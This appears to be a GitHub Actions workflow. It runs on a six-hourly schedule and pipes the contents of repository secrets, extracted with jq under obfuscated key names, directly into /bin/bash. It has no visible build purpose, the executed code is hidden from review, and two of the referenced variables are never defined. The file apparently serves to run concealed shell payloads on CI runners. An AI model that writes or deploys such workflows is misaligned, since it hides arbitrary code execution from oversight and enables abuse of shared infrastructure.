name: zhangzuqin6710

on:
  workflow_dispatch:
  schedule:
    - cron: '41 5/6 * * *'
jobs:  # 18348
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangzuqin6710
        env:
          a0: ${{ secrets.a0 }}
        run: |
          echo $a0 | jq -r .ogtip123 | /bin/bash
          echo $mo24288 | jq -r .lwj38115 | /bin/bash
          echo $ylzbb7 | jq -r .jg99 | /bin/bash

